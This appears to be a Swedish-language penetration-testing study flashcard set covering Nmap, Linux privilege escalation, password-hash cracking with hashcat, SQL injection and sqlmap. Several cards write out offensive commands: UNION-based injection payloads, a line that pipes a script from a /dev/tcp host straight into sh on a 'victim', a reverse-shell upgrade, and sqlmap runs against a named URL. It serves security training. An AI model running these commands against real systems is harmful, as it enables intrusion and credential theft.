Penetrationstestning Flashcards
(46 cards)
Vilket protokoll måste alltid en host svara på?
ARP (Dock endast på lokala subnätet)
Vilka portar skannar Nmap med följande kommando?
Nmap 10.0.0.1
De 1000 VANLIGASTE portarna.
Vilken option ska du använda med Nmap för att skanna alla portar?
-p-
Vad betyder optionerna -sV och -sC i nmap?
Optionen -sV är “Version detection” d.v.s Banner
grabbing.
Exempelvis följande:22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
Optionen -sC är script d.v.s kör anpassade script mot hosten för att få ut mer info. Används exempelvis för att hitta sårbarheter eller möjligheter att logga in anonymt utan lösenord på en tjänst.
Default så scannar nmap endast tcp-portar. Hur gör du för att scanna udp-portar?
Använd optionen -sU. Denna tar dock lång tid och scannar de 1000 vanligaste portarna.
Att scanna alla portar på en host tar mycket lång tid. Att scanna ett helt nät tar ännu längre tid.
Vilket kommando ger dig en snabb överblik över dina rättigheter i /etc/sudoers?
sudo -l
Vilken av följande binärfiler är möjlig att utnyttja för privilege escalation?
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/newgrp
/usr/bin/cp
/usr/bin/cp
Tips är GTFOBins för att kolla detta.
I /etc/shadow-filen hittar du ett hastat lösenord som börjar med $1$.
Vilken form av hash är detta?
En MD5-hash (unix).
I /etc/shadow-filen hittar du följande hash:
$1$h6k3X5db$pp8WQ5R5YYL5bNyQj2wP70
Förklara vad de olika fälten separerade med dollartecken indikerar.
$id$salt$krypteradtext
id är den formen av hash det är.
I /etc/shadow-filen hittar du ett hastat lösenord som börjar med $6$.
Vilken form av hash är detta?
En SHA512-hash.
Hashcat är ett verktyg för att räkna ut hashar. Vad indikerar -m 0 i följande kommando?
hashcat -m 0 -a 0 hashar.txt /usr/share/wordlists/rockyou.txt
-m 0 anger vilken typ av hash vi crackar. I detta fallet en md5-hash.
Hashcat är ett verktyg för att räkna ut hashar. Vad indikerar -a 0 i följande kommando?
hashcat -m 0 -a 0 hashar.txt /usr/share/wordlists/rockyou.txt
Detta indikerar att det är en dictionary attack, eller “straight mode”.
Hashcat räknar här endast ut hasharna av orden i ordlistan och jämför med dina hashar i filen ”hashar.txt”. Detta är en metod som går snabbt även med en lång lista som rockyou.txt.
Hashcat kan användas för att genomföra en s.k. Mask Attack.
Hur fungerar detta?
Provar alla kombinationer från ett givet utrymme precis som i en Brute-Force-attack, men mer specifikt. Detta sparar tid om vi vet något om lösenordet, exempelvis att det endast innehåller siffror.
Exempel:
?d = 0123456789, indikerar på att endast siffror ska användas på den angivna positionen.
Du ska genomföra en Mask-attack med Hashcat.
Vad är de olika charsetsen kan du använda och vad betyder dessa?
?l = abcdefghijklmnopqrstuvwxyz ?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ ?d = 0123456789 ?h = 0123456789abcdef ?H = 0123456789ABCDEF ?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ ?a = ?l?u?d?s ?b = 0x00 - 0xff
En fil som vanligtvis går att hitta på en domän är filen robots.txt. Vad innehåller denna?
Robots Exclusion-protokollet är ett sätt att be crawlers och andra robotar som samlar information åt söktjänster på internet att inte besöka vissa delar av en webbplats.
Detta kan vara en intressant fil att kolla närmare på för att hitta ytterligare directories på webbplatsen.
Vad används ”UNION” till i en SQL-injektion?
UNION används för att lägga till förfrågningar till vår SQL-injektions legitima fråga och kombinera informationen vi vill hämta med den tillsammans med den legitima frågan.
Vad används följande rad till i en SQL-injektion?
UNION ALLSELECT NULL,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema=’jimmysdatabas’–
Hämta alla tabellnamn i databasen ”jimmysdatabas”.
Du vill hämta data från en annan databas med hjälp av ”UNION”. Hur ska du gå till väga?
UNION ALLSELECT NULL,concat(kolumn1,kolumn2) FROM jimmysdatabas2.mariostabell–
Du ska genomföra Privilege Escalation med LinPEAS.sh. Hur går du till väga för att använda det på en maskin du saknar lösenord till?
Du kan exempelvis genomföra följande i en katalog du alltid har skriv- och läsrättigheter i. Exempelvis /tmp.
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.192.128.xx/80 | sh #Victim
Du har efter mycket slit lyckats få ett Reverse Shell via netcat. Nu vill du slippa ångesten över att vara nervös över att (av ren vana) avbryta en process med ”Ctrl-C” och råka avbryta hela anslutningen.
Du vet att det finns python3 på maskinen. Vad gör du?
python -c ‘import pty; pty.spawn(“/bin/bash”)’
Vad är SQLmap?
Sqlmap är ett open source -penetrationstestverktyg som automatiserar processen av att upptäcka och utnyttja SQL-injektionsfel och ta över databasservrar.
Du har följande kommando. Vad indikerar level och risk i detta fallet?
sqlmap -r filen.txt –level 5 –risk 3
Risk:
Standardvärdet är 1, vilket är ofarligt för de flesta SQL -injektionspunkter. Riskvärde 2 lägger till tester för tunga tidsbaserade SQL-injektioner. Värde 3 lägger till OR-baserade SQL-injektionstester.
Level:
Level 5 är den mest djupgående nivån och kommer att testa för ett mycket större antal payloads och boundaries. Detta tar dock mycket längre tid.
Du har följande URL du tror är sårbar för en SQL-injektion. Hur löser du detta med sqlmap?
http://marioparada.eu/vuln/test.php?luckynumber=3
Exempelvis:
sqlmap -u ”http://marioparada.eu/vuln/test.php?luckynumber=3” –level 5 –risk 3
Hur listar du information om de befintliga databaserna med sqlmap?
Lägg till –dbs i slutet för att lista databaser.